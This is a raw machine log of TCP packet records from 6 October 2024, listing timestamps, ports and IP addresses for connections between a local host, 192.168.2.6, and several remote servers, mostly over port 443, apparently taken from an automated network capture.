                                                                                                                            Oct 6, 2024 13:50:11.897310972 CEST49798443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:11.897351027 CEST4434979813.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.898072958 CEST49800443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:11.898101091 CEST4434980013.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.898155928 CEST49800443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:11.898334980 CEST49801443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:11.898359060 CEST4434980113.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.898416042 CEST49801443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:11.898607969 CEST49800443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:11.898622990 CEST4434980013.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.899348974 CEST49799443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:11.899368048 CEST4434979913.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.899900913 CEST49802443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:11.899915934 CEST4434980213.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.899961948 CEST49802443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:11.900022984 CEST49801443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:11.900032043 CEST4434980113.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.900180101 CEST49802443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:11.900187016 CEST4434980213.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.912967920 CEST8049721165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.913062096 CEST4972180192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:11.931404114 CEST44349793104.17.247.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.981295109 CEST8049723165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.981354952 CEST4972380192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:11.993115902 CEST44349793104.17.247.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.993278980 CEST44349793104.17.247.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.993330956 CEST49793443192.168.2.6104.17.247.203
                                                                                                                            Oct 6, 2024 13:50:11.994213104 CEST49803443192.168.2.640.113.110.67
                                                                                                                            Oct 6, 2024 13:50:11.994251013 CEST4434980340.113.110.67192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.994307995 CEST49803443192.168.2.640.113.110.67
                                                                                                                            Oct 6, 2024 13:50:11.995007038 CEST49803443192.168.2.640.113.110.67
                                                                                                                            Oct 6, 2024 13:50:11.995023012 CEST4434980340.113.110.67192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.996469021 CEST49793443192.168.2.6104.17.247.203
                                                                                                                            Oct 6, 2024 13:50:11.996484041 CEST44349793104.17.247.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.082896948 CEST4972180192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:12.082942963 CEST4972380192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:12.083511114 CEST49804443192.168.2.6104.17.247.203
                                                                                                                            Oct 6, 2024 13:50:12.083539963 CEST44349804104.17.247.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.083595037 CEST49804443192.168.2.6104.17.247.203
                                                                                                                            Oct 6, 2024 13:50:12.083843946 CEST49804443192.168.2.6104.17.247.203
                                                                                                                            Oct 6, 2024 13:50:12.083867073 CEST44349804104.17.247.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.218138933 CEST8049721165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.218152046 CEST8049723165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.409769058 CEST44349795172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.410137892 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.415750980 CEST49796443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:12.415771008 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.415880919 CEST49795443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:12.415898085 CEST44349795172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.416274071 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.416291952 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.416378021 CEST44349795172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.416399002 CEST49796443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:12.416409016 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.416626930 CEST49796443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:12.417009115 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.440980911 CEST49796443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:12.441118956 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.442076921 CEST49795443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:12.442220926 CEST44349795172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.442229986 CEST49796443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:12.442249060 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.442651987 CEST49795443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:12.487411976 CEST44349795172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.488914013 CEST44349797172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.489454985 CEST49797443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:12.489490986 CEST44349797172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.490019083 CEST44349797172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.490020037 CEST44349794172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.490042925 CEST44349797172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.490154982 CEST49797443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:12.490185022 CEST44349797172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.490246058 CEST49797443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:12.490649939 CEST49794443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:12.490700006 CEST44349794172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.491059065 CEST44349797172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.491235971 CEST44349794172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.491575003 CEST49797443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:12.491671085 CEST44349797172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.491868019 CEST49794443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:12.491966963 CEST44349794172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.491997004 CEST49797443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:12.492013931 CEST44349797172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.492053032 CEST49794443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:12.535449028 CEST44349794172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.536719084 CEST4434980013.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.537437916 CEST49800443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:12.537453890 CEST4434980013.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.537899017 CEST49800443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:12.537904024 CEST4434980013.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.540532112 CEST4434980213.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.541182041 CEST49802443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:12.541193008 CEST4434980213.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.541507959 CEST49802443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:12.541512966 CEST4434980213.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.557337046 CEST4434979813.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.557547092 CEST49796443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:12.562834978 CEST4434980113.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.563235998 CEST49798443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:12.563261986 CEST4434979813.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.563802004 CEST49798443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:12.563807011 CEST4434979813.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.564146996 CEST49801443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:12.564153910 CEST4434980113.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.564599991 CEST49801443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:12.564610958 CEST4434980113.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.565289021 CEST4434979913.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.565721035 CEST49799443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:12.565745115 CEST4434979913.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.566075087 CEST49799443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:12.566081047 CEST4434979913.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.635844946 CEST4434980013.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.636048079 CEST4434980013.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.636157990 CEST49800443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:12.639014959 CEST4434980213.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.639092922 CEST4434980213.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.639224052 CEST49802443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:12.651411057 CEST49800443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:12.651479959 CEST4434980013.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.653347015 CEST49802443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:12.653382063 CEST4434980213.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.653397083 CEST49802443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:12.653404951 CEST4434980213.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.655947924 CEST49805443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:12.655989885 CEST4434980513.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.656130075 CEST49805443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:12.656410933 CEST49805443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:12.656424046 CEST4434980513.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.657460928 CEST49806443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:12.657469034 CEST4434980613.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.657565117 CEST49806443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:12.657664061 CEST49806443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:12.657672882 CEST4434980613.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.662692070 CEST4434979813.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.662765026 CEST4434979813.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.662859917 CEST49798443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:12.665142059 CEST44349804104.17.247.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.666234970 CEST4434980113.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.666291952 CEST4434980113.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.666347980 CEST49801443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:12.668333054 CEST4434979913.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.668474913 CEST4434979913.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.668541908 CEST49799443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:12.669287920 CEST49798443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:12.669287920 CEST49798443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:12.669302940 CEST4434979813.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.669312000 CEST4434979813.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.669897079 CEST49801443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:12.669919968 CEST4434980113.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.669934034 CEST49801443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:12.669940948 CEST4434980113.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.670556068 CEST49799443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:12.670569897 CEST4434979913.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.671261072 CEST49804443192.168.2.6104.17.247.203
                                                                                                                            Oct 6, 2024 13:50:12.671286106 CEST44349804104.17.247.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.671797037 CEST44349804104.17.247.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.698199987 CEST49797443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:12.698524952 CEST49794443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:12.770004034 CEST49804443192.168.2.6104.17.247.203
                                                                                                                            Oct 6, 2024 13:50:12.770293951 CEST44349804104.17.247.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.770728111 CEST49804443192.168.2.6104.17.247.203
                                                                                                                            Oct 6, 2024 13:50:12.815407038 CEST44349804104.17.247.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.879793882 CEST44349804104.17.247.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.880024910 CEST44349804104.17.247.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.880249977 CEST49804443192.168.2.6104.17.247.203
                                                                                                                            Oct 6, 2024 13:50:12.942667007 CEST49807443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:12.942712069 CEST4434980713.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.942807913 CEST49807443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:12.943157911 CEST49808443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:12.943243980 CEST4434980813.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.943321943 CEST49808443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:12.943695068 CEST49807443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:12.943716049 CEST4434980713.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.943989992 CEST49808443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:12.944026947 CEST4434980813.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.953267097 CEST49809443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:12.953306913 CEST4434980913.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.953392982 CEST49809443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:12.953530073 CEST49809443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:12.953538895 CEST4434980913.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.988269091 CEST4434980340.113.110.67192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.988404989 CEST49803443192.168.2.640.113.110.67
                                                                                                                            Oct 6, 2024 13:50:12.991332054 CEST44349795172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.991362095 CEST44349795172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.991427898 CEST49795443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:12.991444111 CEST44349795172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.991573095 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.991683960 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.991739035 CEST49796443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:12.991770983 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.994072914 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.994332075 CEST44349795172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.994398117 CEST49796443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:12.994406939 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:12.994437933 CEST49795443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:12.994447947 CEST44349795172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.000787973 CEST44349795172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.000802040 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.000878096 CEST49795443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.000889063 CEST44349795172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.000916958 CEST49796443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.000925064 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.006547928 CEST49803443192.168.2.640.113.110.67
                                                                                                                            Oct 6, 2024 13:50:13.006565094 CEST4434980340.113.110.67192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.006730080 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.006788015 CEST4434980340.113.110.67192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.006838083 CEST49796443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.006844997 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.007004023 CEST44349795172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.008469105 CEST49795443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.008479118 CEST44349795172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.012942076 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.013518095 CEST44349795172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.013581038 CEST49795443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.013582945 CEST49796443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.013591051 CEST44349795172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.013591051 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.019264936 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.019737959 CEST44349795172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.019815922 CEST49796443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.019817114 CEST49795443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.019824028 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.019825935 CEST44349795172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.025502920 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.025984049 CEST44349795172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.026051044 CEST49796443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.026051044 CEST49795443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.026058912 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.026061058 CEST44349795172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.031873941 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.032509089 CEST44349795172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.032576084 CEST49796443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.032577991 CEST49795443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.032582998 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.032588005 CEST44349795172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.057404041 CEST49803443192.168.2.640.113.110.67
                                                                                                                            Oct 6, 2024 13:50:13.070823908 CEST44349794172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.070935011 CEST44349794172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.071012974 CEST49794443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.071080923 CEST44349794172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.073333025 CEST44349794172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.074614048 CEST44349797172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.074657917 CEST44349797172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.074690104 CEST49794443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.074711084 CEST44349794172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.074841022 CEST49797443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.074911118 CEST44349797172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.077800035 CEST44349797172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.079617977 CEST44349794172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.079689980 CEST49797443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.079691887 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.079710960 CEST44349797172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.079744101 CEST49794443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.079749107 CEST49796443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.079760075 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.079761028 CEST44349794172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.080079079 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.080112934 CEST44349795172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.080167055 CEST49795443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.080168009 CEST49796443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.080174923 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.080183983 CEST44349795172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.080964088 CEST44349795172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.084906101 CEST49795443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.084916115 CEST44349795172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.085939884 CEST44349794172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.085994959 CEST49794443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.086009979 CEST44349794172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.086407900 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.086457968 CEST49796443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.086467981 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.087086916 CEST44349797172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.087140083 CEST49797443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.087153912 CEST44349797172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.087199926 CEST44349795172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.087239981 CEST49795443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.087248087 CEST44349795172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.092201948 CEST44349794172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.092279911 CEST49794443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.092294931 CEST44349794172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.092636108 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.092686892 CEST49796443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.092694998 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.093183994 CEST44349797172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.093214035 CEST44349797172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.093244076 CEST49797443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.093261957 CEST44349797172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.093312025 CEST49797443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.093502045 CEST44349795172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.093543053 CEST49795443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.093554020 CEST44349795172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.098445892 CEST44349794172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.098517895 CEST49794443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.098541975 CEST44349794172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.098843098 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.098891973 CEST49796443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.098901987 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.099430084 CEST44349797172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.099764109 CEST44349795172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.099801064 CEST49795443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.099811077 CEST44349795172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.104599953 CEST44349794172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.104676962 CEST49794443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.104723930 CEST44349794172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.105308056 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.105359077 CEST49796443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.105366945 CEST44349796172.217.18.1192.168.2.6
